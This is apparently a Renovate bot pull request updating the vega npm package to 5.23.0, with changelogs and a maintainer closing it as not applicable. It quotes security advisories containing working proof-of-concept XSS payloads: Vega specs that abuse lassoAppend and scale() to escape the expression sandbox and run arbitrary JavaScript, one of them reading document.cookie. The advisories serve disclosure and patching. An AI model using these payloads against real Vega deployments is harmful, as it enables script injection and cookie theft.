Update npm package vega to v5.23.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vega	5.17.3 -> 5.23.0

---

⚠ Dependency Lookup Warnings ⚠

Warnings were logged while processing this repo. Please check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2023-26487

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceed minDist or its the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#​006BB4' : '#​939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

CVE-2023-26486

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA

---

Release Notes

vega/vega (vega)

v5.23.0

Compare Source

Changes from v5.22.1:

This version contains dependency updates, bug fixes, and security patches, plus a few extra utilities to aid Vega-Lite.

monorepo

• Update dependencies, including D3 packages.
• Update rollup config to use .mjs extensions.

vega-canvas

• Update rollup config.

vega-crossfilter

• Update rollup config.

vega-dataflow

• Update rollup config.

vega-encode

• Update rollup config.

vega-event-selector

• Update rollup config.

vega-expression

• Update rollup config.

vega-force

• Update rollup config.

vega-format

• Update rollup config.

vega-functions

• Fix lassoAppend expression function XSS. (Thanks @​arvind!)
• Fix scale expression function XSS (Thanks @​ajxchapman and @​hydrosquall!)
• Update rollup config.

vega-geo

• Update rollup config.

vega-hierarchy

• Update rollup config.

vega-interpreter

• Update rollup config.

vega-label

• Prevent evaluation of unsafe methods, #​3570 (Thanks @​AMoo-Miki!)
• Update rollup config.

vega-loader

• Update rollup config.

vega-parser

• Add view style for Vega-Lite, #​3480 (Thanks @​arvind!)
• Update rollup config.

vega-projection

• Register projections as recognized Vega scales.
• Update rollup config.

vega-projection-extended

• Update rollup config.

vega-regression

• Update rollup config.

vega-runtime

• Update rollup config.

vega-scale

• Add registerScale() and isRegisteredScale() methods. (Thanks @​hydrosquall!)
• Register scales as recognized Vega scales.
• Update rollup config.

vega-scenegraph

• Update test cases to match dependency updates.
• Update rollup config.

vega-schema

• Make __count__ private from schema, #​3659 (Thanks @​lsh!)
• Update rollup config.

vega-selections

• Update rollup config.

vega-statistics

• Update rollup config.

vega-time

• Update rollup config.

vega-transforms

• Update rollup config.

vega-typings

• Make __count__ private from schema, #​3659 (Thanks @​lsh!)
• Update scenegraph item typings (Thanks @​jonathanzong!)
• Update rollup config.

vega-util

• Update typescript config.
• Update rollup config.

vega-view

• Wrap querySelectorAll in Array.from, #​3639 (Thanks @​ravron!)
• Update rollup config.

vega-view-transforms

• Update rollup config.
• Fix autosize="fit-x/y" when legend is larger than plot, #​3474 (Thanks @​stas-sl!)

vega-voronoi

• Update rollup config.

vega-wordcloud

• Update rollup config.

vega-cli

• Update rimraf version, adjust code in response.
• Update rollup config.

vega

• Update test scenes to match dependency updates.
• Update rollup config.

v5.22.1

Compare Source

Changes from v5.22.0:

monorepo

• Update dependencies.

vega-scenegraph

• Fix SVG path parser null check. (#​3451).

v5.22.0

Compare Source

Changes from v5.21.0:

docs

• Add Packed Bubble Chart example. (thanks @​PBI-David!)
• Improve TimeUnit transform documentation.

monorepo

• Update dependencies, including D3 ESM packages.
• Update rollup config to bundle ESM packages for CJS use.
• Update tests to match new dependencies.
• Bump minor version numbers for all affected modules.

vega-functions

• Add lasso selection expression functions. (thanks @​dvmoritzschoefl!)
• Suppress unsupported expression function arguments.

vega-label

• Fix to not assume that a label always has some part inside the chart's bounding box. (thanks @​chanwutk!)

vega-scenegraph

• Fix SVG path close logic. (#​3377)
• Fix SVG renderer dirty check. (#​3411).
• Fix SVG path string parser, update tests. (#​3432)
• Fix SVG mix-blend-mode to use style attribute. (#​3435)

vega-selections

• Optimize selection functions for ID-only stores. (thanks @​arvind!)

vega-transforms

• Fix TimeUnit transform updates.

vega-typings

• Limit type linting to local TypeScript version only. (thanks @​domoritz!)
• Adjust EventListenerHandler typings. (#​3390)

v5.21.0

Compare Source

Changes from v5.20.2:

monorepo

• Update dependencies.

vega

• Update test scenegraphs.

vega-event-selector

• (Breaking) Change exported method name.

vega-expression

• (Breaking) Change exported method names.

vega-label

• Add support for infinite padding, no bounds on label layout. (#​3252)

vega-loader

• Fix loader so that baseURL is not prepended to data: URLs. (#​3195)
• Minor refactoring.

vega-parser

• Update depenencies.

vega-runtime

• Dead code elimination for runtime expression instantiation.
• Minor refactoring.

vega-statistics

• Fix sampleCurve utility to properly scale values in angle subdivision test. (#​3173)

vega-typings

• Update typings. (thanks @​danmarshall and @​domoritz!)

vega-util

• Allow customization of logger handler. (thanks @​challet!)

v5.20.2

Compare Source

Changes from v5.20.1:

vega-view

• Fix container initialization bug.

v5.20.1

Compare Source

Changes from v5.20.0:

monorepo

• Update dependencies.

vega-dataflow

• Fix memory leak on dataflow detach. (thanks @​krisdages!)

vega-transforms

• Fix memory leak on dataflow detach. (thanks @​krisdages!)

vega-typings

• Update typing comments for bindings and projections to fill-in missing Vega-Lite documentation.

v5.20.0

Compare Source

Changes from v5.19.1:

monorepo

• Update CI configuration. (thanks @​domoritz!)
• Update build configuration. (thanks @​domoritz!)
• Update dependencies.

vega

• Add web test for external element binding.

vega-scenegraph

• Add early exit for image rendering with zero width or height.

vega-schema

• Add signal binding to external input element.

vega-typings

• Add signal binding to external input element.

vega-util

• Update inherit utility to use defineProperty, avoids upsetting configurations that ban assignment overrides of Object prototype properties. (#​3109, thanks @​erights!)

vega-view

• Add signal binding to external input element.

v5.19.1

Compare Source

Changes from v5.19.0:

vega-schema

• Fix schema generator for data transforms.

v5.19.0

Compare Source

Changes from v5.18.0:

vega-functions

• Add pluck expression function. (thanks @​arvind!)
• Add additional Vega-Lite selection helper methods. (thanks @​arvind!)

vega-parser

• Fix signal check for data source values property. (thanks @​domoritz!)

vega-scenegraph

• Fix namespace use for SVG metadata. (thanks @​mbostock!)
• Update to JSON schema draft 7. (thanks @​domoritz!)

vega-schema

• Update to JSON schema draft 7. (thanks @​domoritz!)

vega-selections

• Add additional Vega-Lite selection helper methods. (thanks @​arvind!)

v5.18.0

Compare Source

Changes from v5.17.3:

vega

• Refactor: import only default from JSON files. (thanks @​keller-mark!)

vega-functions

• Update vega-selections dependency.

vega-selections

• Add Vega-Lite v5 "point" selection support. (thanks @​arvind!)

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.

[judeallred]

These security issues don't apply because they're components in the build environment of a static website.

[renovate]

Renovate Ignore Notification

Because you closed this PR without merging, Renovate will ignore this update (5.23.0). You will get a PR once a newer version is released. To ignore this dependency forever, add it to the ignoreDeps array of your Renovate config.

If you accidentally closed this PR, or if you changed your mind: rename this PR to get a fresh replacement PR.